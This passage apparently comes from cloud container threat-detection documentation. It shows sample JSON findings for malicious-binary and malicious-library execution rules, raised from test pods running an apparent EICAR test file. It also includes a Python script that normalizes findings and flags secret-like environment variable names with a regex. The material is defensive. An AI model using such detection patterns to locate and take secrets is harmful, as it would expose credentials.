        "argumentsTruncated": false,
        "envVariables": [
          {
            "name": "\"KUBERNETES_SERVICE_PORT\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_PORT\"",
            "val": "\"tcp://10.68.2.129:443\""
          },
          {
            "name": "\"HOSTNAME\"",
            "val": "\"ktd-test-added-test-malicious-binary\""
          },
          {
            "name": "\"HOME\"",
            "val": "\"/root\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",
            "val": "\"10.68.2.129\""
          },
          {
            "name": "\"PATH\"",
            "val": "\"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_PORT\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",
            "val": "\"tcp\""
          },
          {
            "name": "\"DEBIAN_FRONTEND\"",
            "val": "\"noninteractive\""
          },
          {
            "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP\"",
            "val": "\"tcp://10.68.2.129:443\""
          },
          {
            "name": "\"KUBERNETES_SERVICE_HOST\"",
            "val": "\"10.68.2.129\""
          },
          {
            "name": "\"PWD\"",
            "val": "\"/malicious_files\""
          }
        ],
        "pid": "7",
        "parentPid": "1"
      }
    ],
    "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
    "securityPosture": {},
    "severity": "CRITICAL",
    "state": "ACTIVE",
    "vulnerability": {},
    "externalSystems": {}
  },
  "resource": {
    "name": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
    "display_name": "CLUSTER_ID",
    "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "project_display_name": "PROJECT_ID",
    "parent_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "parent_display_name": "PROJECT_ID",
    "type": "google.container.Cluster",
    "folders": []
  },
  "sourceProperties": {
    "sourceId": {
      "projectNumber": "PROJECT_NUMBER",
      "customerOrganizationNumber": "ORGANIZATION_NUMBER"
    },
    "detectionCategory": {
      "ruleName": "added_malicious_binary_executed"
    },
    "detectionPriority": "CRITICAL",
    "affectedResources": [
      {
        "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"
      }
    ],
    "evidence": [
      {
        "sourceLogId": {
          "projectId": "PROJECT_ID",
          "resourceContainer": "projects/PROJECT_NUMBER",
          "timestamp": {
            "seconds": "1699905066",
            "nanos": 618571329
          }
        }
      }
    ],
    "properties": {},
    "findingId": "FINDING_ID",
    "contextUris": {
      "mitreUri": {
        "displayName": "MITRE Link",
        "url": "https://attack.mitre.org/techniques/T1105/"
      },
      "virustotalIndicatorQueryUri": [
        {
          "displayName": "VirusTotal IP Link",
          "url": "https://www.virustotal.com/gui/file/275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f/detection"
        }
      ],
      "cloudLoggingQueryUri": [
        {
          "displayName": "Cloud Logging Query Link",
          "url": "https://console.cloud.google.com/logs/query;query=timestamp%3D%222023-11-13T19:51:06.618571329Z%22%0AinsertId%3D%22%22?project=PROJECT_NUMBER"
        }
      ],
      "relatedFindingUri": {}
    }
  }
}
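
As an added example that is not part of the original page, the following Python normalizer flattens both finding layouts shown above (the older layout with a flat sourceProperties object and the newer layout with processes, kubernetes and containers fields) into one record, and flags environment variable names that look like secrets, which is the signal for deciding whether to disable the REPORT_ENVIRONMENT_VARIABLES module described earlier. The sample findings are constructed from the formats above with placeholder identifiers, and the sensitive-name pattern is an assumption of this example.

```python
import json
import re

# Environment variable names that commonly carry secrets; a finding whose env
# matches is a reason to consider disabling REPORT_ENVIRONMENT_VARIABLES.
# The pattern is an assumption for this example, not part of the product.
SENSITIVE_NAME = re.compile(r"SECRET|TOKEN|PASS(WORD)?|API_?KEY|PRIVATE_?KEY|CREDENTIAL", re.I)


def _unquote(value):
    """Newer findings wrap string values in literal quotes ('"/tmp/x"'); strip them."""
    if isinstance(value, str) and len(value) >= 2 and value[0] == value[-1] == '"':
        return value[1:-1]
    return value


def normalize_finding(doc: dict) -> dict:
    """Flatten either finding layout into one dict with the fields an analyst
    triages on: where it ran, what ran, and what the process environment held."""
    f = doc["finding"]
    out = {
        "category": f.get("category"),
        "severity": f.get("severity"),
        "cluster": f.get("resourceName"),
        "mitre_techniques": list(f.get("mitreAttack", {}).get("primaryTechniques", [])),
    }
    sp = f.get("sourceProperties") or {}
    if "Process_Binary_Fullpath" in sp:
        # Older layout: flat sourceProperties, env as "NAME=value" strings, numeric pid.
        env_pairs = (e.partition("=") for e in sp.get("Environment_Variables", []))
        out.update(
            namespace=sp.get("Pod_Namespace"), pod=sp.get("Pod_Name"),
            container=sp.get("Container_Name"), image=sp.get("Container_Image_Uri"),
            binary=sp.get("Process_Binary_Fullpath"), sha256=None,
            pid=int(sp.get("Pid", 0)), args=list(sp.get("Process_Arguments", [])),
            env={name: value for name, _, value in env_pairs},
        )
    else:
        # Newer layout: processes[], kubernetes.pods[], containers[], quoted strings.
        proc = (f.get("processes") or [{}])[0]
        pod = (f.get("kubernetes", {}).get("pods") or [{}])[0]
        ctr = (f.get("containers") or [{}])[0]
        binary = proc.get("binary", {})
        out.update(
            namespace=pod.get("ns"), pod=pod.get("name"),
            container=ctr.get("name"), image=ctr.get("uri"),
            binary=_unquote(binary.get("path")), sha256=binary.get("sha256"),
            pid=int(proc.get("pid", 0)), args=[_unquote(a) for a in proc.get("args", [])],
            env={_unquote(e["name"]): _unquote(e["val"]) for e in proc.get("envVariables", [])},
        )
    return out


def sensitive_env_names(env: dict) -> list:
    """Names in the captured environment that look like they hold secrets."""
    return sorted(name for name in env if SENSITIVE_NAME.search(name))


# Constructed samples modelled on the two layouts shown above; all identifiers are
# placeholders and the DB_PASSWORD variable is added only to exercise the check.
LEGACY_FINDING = json.loads(r"""
{"finding": {
  "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",
  "category": "Added Binary Executed", "severity": "CRITICAL",
  "sourceProperties": {
    "Pod_Namespace": "default", "Pod_Name": "POD_NAME", "Container_Name": "CONTAINER_NAME",
    "Container_Image_Uri": "CONTAINER_IMAGE_URI", "Pid": 53.0, "Parent_Pid": 1.0,
    "Process_Binary_Fullpath": "/tmp/dropped", "Process_Arguments": ["/tmp/dropped", "-q"],
    "Environment_Variables": ["KUBERNETES_SERVICE_PORT\u003d443", "DB_PASSWORD\u003dhunter2", "PWD\u003d/"]
  }}}
""")

NEW_FINDING = json.loads(r"""
{"finding": {
  "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",
  "category": "Execution: Added Malicious Binary Executed", "severity": "CRITICAL",
  "containers": [{"name": "CONTAINER_NAME", "uri": "CONTAINER_URI", "imageId": "CONTAINER_IMAGE_ID"}],
  "kubernetes": {"pods": [{"name": "POD_NAME", "ns": "default"}]},
  "mitreAttack": {"primaryTactic": "COMMAND_AND_CONTROL", "primaryTechniques": ["INGRESS_TOOL_TRANSFER"]},
  "processes": [{
    "binary": {"path": "\"/tmp/malicious-binary-should-trigger\"", "size": "68", "sha256": "SHA256_PLACEHOLDER"},
    "args": ["\"/tmp/malicious-binary-should-trigger\""],
    "envVariables": [{"name": "\"KUBERNETES_SERVICE_PORT\"", "val": "\"443\""},
                     {"name": "\"PWD\"", "val": "\"/malicious_files\""}],
    "pid": "7", "parentPid": "1"
  }]
}, "sourceProperties": {"detectionCategory": {"ruleName": "added_malicious_binary_executed"}}}
""")

if __name__ == "__main__":
    for doc in (LEGACY_FINDING, NEW_FINDING):
        rec = normalize_finding(doc)
        print(rec["category"], rec["namespace"] + "/" + rec["pod"], rec["binary"],
              "sensitive env:", sensitive_env_names(rec["env"]))
```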
  

Execution: Added Malicious Library Loaded

{
  "finding": {
    "access": {},
    "application": {},
    "attackExposure": {},
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",
    "category": "Execution: Added Malicious Library Loaded",
    "cloudDlpDataProfile": {},
    "cloudDlpInspection": {},
    "containers": [
      {
        "name": "CONTAINER_NAME",
        "uri": "CONTAINER_URI",
        "imageId": "CONTAINER_IMAGE_ID"
      }
    ],
    "createTime": "2023-11-13T21:40:14.340Z",
    "database": {},
    "eventTime": "2023-11-13T21:40:14.209Z",
    "exfiltration": {},
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",
    "indicator": {},
    "kernelRootkit": {},
    "kubernetes": {
      "pods": [
        {
          "name": "CONTAINER_NAME",
          "ns": "default",
          "containers": [
            {
              "name": "CONTAINER_NAME",
              "uri": "CONTAINER_URI",
              "imageId": "CONTAINER_IMAGE_ID"
            }
          ]
        }
      ],
      "nodes": [
        {
          "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE"
        }
      ]
    },
    "mitreAttack": {
      "primaryTactic": "COMMAND_AND_CONTROL",
      "primaryTechniques": [
        "INGRESS_TOOL_TRANSFER"
      ]
    },
    "mute": "UNDEFINED",
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "parentDisplayName": "Container Threat Detection",
    "processes": [
      {
        "binary": {
          "path": "\"/malicious_files/drop_mal_lib\"",
          "size": "5005064",
          "sha256": "fe2e70de9f77047d3bf5debe3135811300c9c69b937b7fd3e2ca8451a942d5fb",
          "hashedSize": "5005064",
          "partiallyHashed": false
        },
        "libraries": [
          {
            "path": "\"/tmp/added-malicious-library-299fd066380ce690-should-trigger\"",
            "size": "68",
            "sha256": "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f",
            "hashedSize": "68",
            "partiallyHashed": false
          }
        ],
        "script": {
          "size": "0",
          "hashedSize": "0",
          "partiallyHashed": false
        },
        "args": [
          "\"/malicious_files/drop_mal_lib\"",
          "\"/tmp/added-malicious-library-299fd066380ce690-should-trigger\""
        ],
        "argumentsTruncated": false,
        "envVariables": [
          {
            "name": "\"KUBERNETES_SERVICE_PORT\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_PORT\"",
            "val": "\"tcp://10.108.174.129:443\""
          },
          {
            "name": "\"HOSTNAME\"",
            "val": "\"ktd-test-added-malicious-library\""
          },
          {
            "name": "\"HOME\"",
            "val": "\"/root\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",
            "val": "\"10.108.174.129\""
          },
          {
            "name": "\"PATH\"",
            "val": "\"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_PORT\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",
            "val": "\"tcp\""
          },
          {
            "name": "\"DEBIAN_FRONTEND\"",
            "val": "\"noninteractive\""
          },
          {
            "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP\"",
            "val": "\"tcp://10.108.174.129:443\""
          },
          {
            "name": "\"KUBERNETES_SERVICE_HOST\"",
            "val": "\"10.108.174.129\""
          },
          {
            "name": "\"PWD\"",
            "val": "\"/malicious_files\""
          }
        ],
        "pid": "8",
        "parentPid": "1"
      }
    ],
    "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
    "securityPosture": {},
    "severity": "CRITICAL",
    "state": "ACTIVE",
    "vulnerability": {},
    "externalSystems": {}
  },
  "resource": {
    "name": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
    "display_name": "CLUSTER_ID",
    "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "project_display_name": "PROJECT_ID",
    "parent_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "parent_display_name": "PROJECT_ID",
    "type": "google.container.Cluster",
    "folders": []
  },
  "sourceProperties": {
    "sourceId": {
      "projectNumber": "PROJECT_NUMBER",
      "customerOrganizationNumber": "ORGANIZATION_NUMBER"
    },
    "detectionCategory": {
      "ruleName": "added_malicious_library_loaded"
    },
    "detectionPriority": "CRITICAL",
    "affectedResources": [
      {
        "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"
      }
    ],
    "evidence": [
      {
        "sourceLogId": {
          "projectId": "PROJECT_ID",
          "resourceContainer": "projects/PROJECT_NUMBER",
          "timestamp": {
            "seconds": "1699911603",
            "nanos": 535268047
          }
        }
      }
    ],
    "properties": {},
    "findingId": "FINDING_ID",
    "contextUris": {
      "mitreUri": {
        "displayName": "MITRE Link",
        "url": "https://attack.mitre.org/techniques/T1105/"
      },
      "virustotalIndicatorQueryUri": [
        {
          "displayName": "VirusTotal IP Link",
          "url": "https://www.virustotal.com/gui/file/275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f/detection"
        }
      ],
      "cloudLoggingQueryUri": [
        {
          "displayName": "Cloud Logging Query Link",
          "url": "https://console.cloud.google.com/logs/query;query=timestamp%3D%222023-11-13T21:40:03.535268047Z%22%0AinsertId%3D%22%22?project=PROJECT_NUMBER"
        }
      ],
      "relatedFindingUri": {}
    }
  }
}
  

Execution: Built in Malicious Binary Executed

{
  "finding": {
    "access": {},
    "application": {},
    "attackExposure": {},
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",
    "category": "Execution: Built in Malicious Binary Executed",
    "cloudDlpDataProfile": {},
    "cloudDlpInspection": {},
    "containers": [
      {
        "name": "CONTAINER_NAME",
        "uri": "CONTAINER_URI",
        "imageId": "CONTAINER_IMAGE_ID"
      }
    ],
    "createTime": "2023-11-13T21:38:57.405Z",
    "database": {},
    "eventTime": "2023-11-13T21:38:57.250Z",
    "exfiltration": {},
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",
    "indicator": {},
    "kernelRootkit": {},
    "kubernetes": {
      "pods": [
        {
          "name": "CONTAINER_NAME",
          "ns": "default",
          "containers": [
            {
              "name": "CONTAINER_NAME",
              "uri": "CONTAINER_URI",
              "imageId": "CONTAINER_IMAGE_ID"
            }
          ]
        }
      ],
      "nodes": [
        {
          "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE"
        }
      ]
    },
    "mitreAttack": {
      "primaryTactic": "EXECUTION",
      "primaryTechniques": [
        "NATIVE_API"
      ]
    },
    "mute": "UNDEFINED",
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "parentDisplayName": "Container Threat Detection",
    "processes": [
      {
        "binary": {
          "path": "\"/malicious_files/eicar_testing_file\"",
          "size": "68",
          "sha256": "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f",
          "hashedSize": "68",
          "partiallyHashed": false
        },
        "script": {
          "size": "0",
          "hashedSize": "0",
          "partiallyHashed": false
        },
        "args": [
          "\"/malicious_files/eicar_testing_file\"",
          "\"built-in-malicious-binary-818358caa95b6d42\""
        ],
        "argumentsTruncated": false,
        "envVariables": [
          {
            "name": "\"KUBERNETES_SERVICE_PORT\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_PORT\"",
            "val": "\"tcp://10.77.124.129:443\""
          },
          {
            "name": "\"HOSTNAME\"",
            "val": "\"ktd-test-built-in-malicious-binary\""
          },
          {
            "name": "\"HOME\"",
            "val": "\"/root\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",
            "val": "\"10.77.124.129\""
          },
          {
            "name": "\"PATH\"",
            "val": "\"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_PORT\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",
            "val": "\"tcp\""
          },
          {
            "name": "\"DEBIAN_FRONTEND\"",
            "val": "\"noninteractive\""
          },
          {
            "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP\"",
            "val": "\"tcp://10.77.124.129:443\""
          },
          {
            "name": "\"KUBERNETES_SERVICE_HOST\"",
            "val": "\"10.77.124.129\""
          },
          {
            "name": "\"PWD\"",
            "val": "\"/malicious_files\""
          }
        ],
        "pid": "7",
        "parentPid": "1"
      }
    ],
    "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
    "securityPosture": {},
    "severity": "CRITICAL",
    "state": "ACTIVE",
    "vulnerability": {},
    "externalSystems": {}
  },
  "resource": {
    "name": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
    "display_name": "CLUSTER_ID",
    "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "project_display_name": "PROJECT_ID",
    "parent_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "parent_display_name": "PROJECT_ID",
    "type": "google.container.Cluster",
    "folders": []
  },
  "sourceProperties": {
    "sourceId": {
      "projectNumber": "PROJECT_NUMBER",
      "customerOrganizationNumber": "ORGANIZATION_NUMBER"
    },
    "detectionCategory": {
      "ruleName": "built_in_malicious_binary_executed"
    },
    "detectionPriority": "CRITICAL",
    "affectedResources": [
      {
        "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"
      }
    ],
    "evidence": [
      {
        "sourceLogId": {
          "projectId": "PROJECT_ID",
          "resourceContainer": "projects/PROJECT_NUMBER",
          "timestamp": {
            "seconds": "1699911519",
            "nanos": 603253608
          }
        }
      }
    ],
    "properties": {},
    "findingId": "FINDING_ID",
    "contextUris": {
      "mitreUri": {
        "displayName": "MITRE Link",
        "url": "https://attack.mitre.org/techniques/T1106/"
      },
      "virustotalIndicatorQueryUri": [
        {
          "displayName": "VirusTotal IP Link",
          "url": "https://www.virustotal.com/gui/file/275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f/detection"
        }
      ],
      "cloudLoggingQueryUri": [
        {
          "displayName": "Cloud Logging Query Link",
          "url": "https://console.cloud.google.com/logs/query;query=timestamp%3D%222023-11-13T21:38:39.603253608Z%22%0AinsertId%3D%22%22?project=PROJECT_NUMBER"
        }
      ],
      "relatedFindingUri": {}
    }
  }
}
  

Execution: Modified Malicious Binary Executed

{
  "finding": {
    "access": {},
    "application": {},
    "attackExposure": {},
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",
    "category": "Execution: Modified Malicious Binary Executed",
    "cloudDlpDataProfile": {},
    "cloudDlpInspection": {},
    "containers": [
      {
        "name": "CONTAINER_NAME",
        "uri": "CONTAINER_URI",
        "imageId": "CONTAINER_IMAGE_ID"
      }
    ],
    "createTime": "2023-11-13T21:38:51.893Z",
    "database": {},
    "eventTime": "2023-11-13T21:38:51.525Z",
    "exfiltration": {},
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",
    "indicator": {},
    "kernelRootkit": {},
    "kubernetes": {
      "pods": [
        {
          "name": "CONTAINER_NAME",
          "ns": "default",
          "containers": [
            {
              "name": "CONTAINER_NAME",
              "uri": "CONTAINER_URI",
              "imageId": "CONTAINER_IMAGE_ID"
            }
          ]
        }
      ],
      "nodes": [
        {
          "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE"
        }
      ]
    },
    "mitreAttack": {
      "primaryTactic": "COMMAND_AND_CONTROL",
      "primaryTechniques": [
        "INGRESS_TOOL_TRANSFER"
      ]
    },
    "mute": "UNDEFINED",
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "parentDisplayName": "Container Threat Detection",
    "processes": [
      {
        "binary": {
          "path": "\"/malicious_files/file_to_be_modified\"",
          "size": "68",
          "sha256": "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f",
          "hashedSize": "68",
          "partiallyHashed": false
        },
        "script": {
          "size": "0",
          "hashedSize": "0",
          "partiallyHashed": false
        },
        "args": [
          "\"/malicious_files/file_to_be_modified\"",
          "\"modified-malicious-binary-da2a7b72e6008bc3\""
        ],
        "argumentsTruncated": false,
        "envVariables": [
          {
            "name": "\"KUBERNETES_SERVICE_PORT\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_PORT\"",
            "val": "\"tcp://10.77.124.129:443\""
          },
          {
            "name": "\"HOSTNAME\"",
            "val": "\"ktd-test-modified-malicious-binary\""
          },
          {
            "name": "\"HOME\"",
            "val": "\"/root\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",
            "val": "\"10.77.124.129\""
          },
          {
            "name": "\"PATH\"",
            "val": "\"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_PORT\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",
            "val": "\"tcp\""
          },
          {
            "name": "\"DEBIAN_FRONTEND\"",
            "val": "\"noninteractive\""
          },
          {
            "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP\"",
            "val": "\"tcp://10.77.124.129:443\""
          },
          {
            "name": "\"KUBERNETES_SERVICE_HOST\"",
            "val": "\"10.77.124.129\""
          },
          {
            "name": "\"PWD\"",
            "val": "\"/malicious_files\""
          }
        ],
        "pid": "8",
        "parentPid": "1"
      }
    ],
    "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
    "securityPosture": {},
    "severity": "CRITICAL",
    "state": "ACTIVE",
    "vulnerability": {},
    "externalSystems": {}
  },
  "resource": {
    "name": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
    "display_name": "CLUSTER_ID",
    "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "project_display_name": "PROJECT_ID",
    "parent_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "parent_display_name": "PROJECT_ID",
    "type": "google.container.Cluster",
    "folders": []
  },
  "sourceProperties": {
    "sourceId": {
      "projectNumber": "PROJECT_NUMBER",
      "customerOrganizationNumber": "ORGANIZATION_NUMBER"
    },
    "detectionCategory": {
      "ruleName": "modified_malicious_binary_executed"
    },
    "detectionPriority": "CRITICAL",
    "affectedResources": [
      {
        "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"
      }
    ],
    "evidence": [
      {
        "sourceLogId": {
          "projectId": "PROJECT_ID",
          "resourceContainer": "projects/PROJECT_NUMBER",
          "timestamp": {
            "seconds": "1699905066",
            "nanos": 618571329
          }
        }
      }
    ],
    "properties": {},
    "findingId": "FINDING_ID",
    "contextUris": {
      "mitreUri": {
        "displayName": "MITRE Link",
        "url": "https://attack.mitre.org/techniques/T1105/"
      },
      "virustotalIndicatorQueryUri": [
        {
          "displayName": "VirusTotal IP Link",
          "url": "https://www.virustotal.com/gui/file/275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f/detection"
        }
      ],
      "cloudLoggingQueryUri": [
        {
          "displayName": "Cloud Logging Query Link",
          "url": "https://console.cloud.google.com/logs/query;query=timestamp%3D%222023-11-13T21:38:39.084524438Z%22%0AinsertId%3D%22%22?project=PROJECT_NUMBER"
        }
      ],
      "relatedFindingUri": {}
    }
  }
}
  

Execution: Modified Malicious Library Loaded

{
  "finding": {
    "access": {},
    "application": {},
    "attackExposure": {},
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",
    "category": "Execution: Modified Malicious Library Loaded",
    "cloudDlpDataProfile": {},
    "cloudDlpInspection": {},
    "containers": [
      {
        "name": "CONTAINER_NAME",
        "uri": "CONTAINER_URI",
        "imageId": "CONTAINER_IMAGE_ID"
      }
    ],
    "createTime": "2023-11-13T21:38:55.271Z",
    "database": {},
    "eventTime": "2023-11-13T21:38:55.133Z",
    "exfiltration": {},
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",
    "indicator": {},
    "kernelRootkit": {},
    "kubernetes": {
      "pods": [
        {
          "name": "CONTAINER_NAME",
          "ns": "default",
          "containers": [
            {
              "name": "CONTAINER_NAME",
              "uri": "CONTAINER_URI",
              "imageId": "CONTAINER_IMAGE_ID"
            }
          ]
        }
      ],
      "nodes": [
        {
          "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE"
        }
      ]
    },
    "mitreAttack": {
      "primaryTactic": "COMMAND_AND_CONTROL",
      "primaryTechniques": [
        "INGRESS_TOOL_TRANSFER"
      ]
    },
    "mute": "UNDEFINED",
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "parentDisplayName": "Container Threat Detection",
    "processes": [
      {
        "binary": {
          "path": "\"/malicious_files/drop_mal_lib\"",
          "size": "5005064",
          "sha256": "fe2e70de9f77047d3bf5debe3135811300c9c69b937b7fd3e2ca8451a942d5fb",
          "hashedSize": "5005064",
          "partiallyHashed": false
        },
        "libraries": [
          {
            "path": "\"/malicious_files/file_to_be_modified\"",
            "size": "68",
            "sha256": "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f",
            "hashedSize": "68",
            "partiallyHashed": false
          }
        ],
        "script": {
          "size": "0",
          "hashedSize": "0",
          "partiallyHashed": false
        },
        "args": [
          "\"/malicious_files/drop_mal_lib\"",
          "\"/malicious_files/file_to_be_modified\"",
          "\"/tmp/modified-malicious-library-430bbedd7049b0d1\""
        ],
        "argumentsTruncated": false,
        "envVariables": [
          {
            "name": "\"KUBERNETES_SERVICE_PORT\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_PORT\"",
            "val": "\"tcp://10.77.124.129:443\""
          },
          {
            "name": "\"HOSTNAME\"",
            "val": "\"ktd-test-modified-malicious-library\""
          },
          {
            "name": "\"HOME\"",
            "val": "\"/root\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",
            "val": "\"10.77.124.129\""
          },
          {
            "name": "\"PATH\"",
            "val": "\"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_PORT\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",
            "val": "\"tcp\""
          },
          {
            "name": "\"DEBIAN_FRONTEND\"",
            "val": "\"noninteractive\""
          },
          {
            "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP\"",
            "val": "\"tcp://10.77.124.129:443\""
          },
          {
            "name": "\"KUBERNETES_SERVICE_HOST\"",
            "val": "\"10.77.124.129\""
          },
          {
            "name": "\"PWD\"",
            "val": "\"/malicious_files\""
          }
        ],
        "pid": "8",
        "parentPid": "1"
      }
    ],
    "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
    "securityPosture": {},
    "severity": "CRITICAL",
    "state": "ACTIVE",
    "vulnerability": {},
    "externalSystems": {}
  },
  "resource": {
    "name": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
    "display_name": "CLUSTER_ID",
    "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "project_display_name": "PROJECT_ID",
    "parent_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "parent_display_name": "PROJECT_ID",
    "type": "google.container.Cluster",
    "folders": []
  },
  "sourceProperties": {
    "sourceId": {
      "projectNumber": "PROJECT_NUMBER",
      "customerOrganizationNumber": "ORGANIZATION_NUMBER"
    },
    "detectionCategory": {
      "ruleName": "modified_malicious_library_loaded"
    },
    "detectionPriority": "CRITICAL",
    "affectedResources": [
      {
        "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"
      }
    ],
    "evidence": [
      {
        "sourceLogId": {
          "projectId": "PROJECT_ID",
          "resourceContainer": "projects/PROJECT_NUMBER",
          "timestamp": {
            "seconds": "1699911519",
            "nanos": 124151422
          }
        }
      }
    ],
    "properties": {},
    "findingId": "FINDING_ID",
    "contextUris": {
      "mitreUri": {
        "displayName": "MITRE Link",
        "url": "https://attack.mitre.org/techniques/T1105/"
      },
      "virustotalIndicatorQueryUri": [
        {
          "displayName": "VirusTotal IP Link",
